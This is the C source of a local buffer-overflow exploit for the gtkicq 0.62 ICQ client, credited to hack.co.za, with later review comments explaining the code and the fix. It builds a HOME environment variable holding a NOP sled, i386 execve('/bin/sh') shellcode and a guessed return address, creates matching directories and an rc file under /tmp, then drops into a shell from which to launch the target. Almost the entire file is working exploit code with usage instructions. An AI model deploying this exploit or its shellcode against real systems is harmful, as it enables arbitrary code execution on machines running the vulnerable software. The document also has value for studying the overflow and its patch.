/**
*** gtkicq-0.62 sploit
***
*** overflow : "HOME" environment variable
*** from file : util.c & rcfile.c
*** patch : replace every strcpy with strncpy ;) (strncpy alone does not
*** NUL-terminate on truncation -- bound the copy and terminate it explicitly)
*** - don't trust environment variables
*** launch a shell.
***
*** Usage : ./a.out [offset]
*** then run gtkicq
**/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define NOP '\x90' /* single-byte x86 NOP, used to pad the landing zone in main() */
#define OFFSET 256 /* default distance subtracted from get_sp() when no argv[1] is given */
/*
 * Position-independent i386 stub; the per-byte comments give the disassembly.
 * The leading jmp / trailing call pair leaves the address of the bytes that
 * follow the call in %esi (pop %esi), and the stub then patches those bytes
 * in place before issuing int $0x80 twice.
 * NOTE(review): this is the 32-bit Linux int $0x80 ABI; the file only makes
 * sense as a 32-bit build (see the index arithmetic in main()).
 */
char shellcode[] =
"\xeb\x1f" /* jmp <end> */
/* <start>: */
"\x5e" /* pop %esi */
"\x31\xc0" /* xor %eax,%eax */
"\x88\x46\x07" /* mov %al,0x7(%esi) */
"\x89\x76\x08" /* mov %esi,0x8(%esi) */
"\x89\x46\x0c" /* mov %eax,0xc(%esi) */
"\xb0\x0b" /* mov $0xb,%al */
"\x89\xf3" /* mov %esi,%ebx */
"\x8d\x4e\x08" /* lea 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* lea 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xor %ebx,%ebx */
"\x31\xc0" /* xor %eax,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
/* <end>: */
"\xe8\xdc\xff\xff\xff"; /* call 804819d <start> (relative call; the absolute address in the comment is from the original listing) */
/*
 * Return the current stack pointer (i386 only).
 * NOTE(review): there is no return statement; the function relies on the asm
 * leaving %esp in %eax, the i386 return register. Falling off the end of a
 * non-void function and then using the value is undefined behaviour, and the
 * optimizer may discard the asm or clobber %eax afterwards -- the robust form
 * uses an output operand (asm("movl %%esp, %0" : "=r"(sp))) and returns sp.
 */
unsigned long get_sp()
{
asm("movl %esp, %eax");
}
extern char **environ; /* process environment, handed unchanged to the execve() in main() */
/*
 * Build a HOME directory whose path name carries the payload, export it,
 * create the ~/.icq/gtkicqrc file gtkicq reads, then exec an interactive
 * shell so the target can be started with that environment.
 *
 * Layout of home[] (300 bytes, zeroed first so the tail stays NUL-terminated):
 *   [0..5]      "/tmp/X"
 *   [6..210]    NOP padding
 *   [211..248]  shellcode (38 bytes), then "/bin" [249..252] and "/sh" [253..255]
 *   [256],[260] the guessed return address (get_sp() - offset), stored as two
 *               unsigned longs; the terminator at [256] is overwritten and the
 *               zeroed bytes from [264] on re-terminate the string
 *
 * NOTE(review): the index arithmetic assumes sizeof(unsigned long) == 4, i.e.
 * a 32-bit build; on LP64 each store is 8 bytes and the two overlap.
 * NOTE(review): bzero/strcpy/strcat are called without <string.h>/<strings.h>,
 * so they are implicitly declared (an error in C99 and later).
 * NOTE(review): the defect this targets is an unbounded strcpy of getenv("HOME")
 * in util.c/rcfile.c; the durable fix is a length check on the variable plus a
 * bounded copy that NUL-terminates (snprintf), not strncpy alone. No return
 * value of mkdir/setenv/open/execve is checked anywhere below.
 */
int main(int argc, char **argv)
{
unsigned long *lptr;
unsigned long retaddr;
char *str; /* unused */
char home[300];
int i;
int offset;
char *cmd[2];
bzero(home, 300);
strcpy(home, "/tmp/X");
/* NOP padding from index 6 up to (not including) 211 */
for(i = 6; i < 211; i++)
home[i] = NOP;
strcat(home, shellcode);
mkdir(home, 0755); /* create each prefix so the final HOME path exists */
strcat(home, "/bin");
mkdir(home, 0755);
strcat(home, "/sh");
mkdir(home, 0755);
/* optional argv[1] overrides the default offset; atoi() reports no errors,
 * so a non-numeric argument silently becomes 0 */
if(argc > 1)
offset = atoi(argv[1]);
else
offset = OFFSET;
retaddr = get_sp() - offset;
/* two unaligned stores of retaddr at [256] and [260]; see the layout above */
lptr = (unsigned long *) &home[256];
*lptr = retaddr;
lptr = (unsigned long *) &home[260];
*lptr = retaddr;
mkdir(home, 0755);
setenv("HOME", home, 1); /* export the full path as HOME for the child shell */
strcat(home, "/.icq");
mkdir(home, 0755);
strcat(home, "/gtkicqrc");
i = open(home, O_CREAT|O_WRONLY, 0644); /* creates an empty rc file */
close(i); /* an open() failure (-1) is passed straight to close() */
cmd[0] = "/bin/sh";
cmd[1] = 0;
puts("run gtkicq from this shell.");
execve(cmd[0], cmd, environ);
return 0; /* only reached if execve() fails; errno is not reported */
}
/* www.hack.co.za [7 August 2000]*/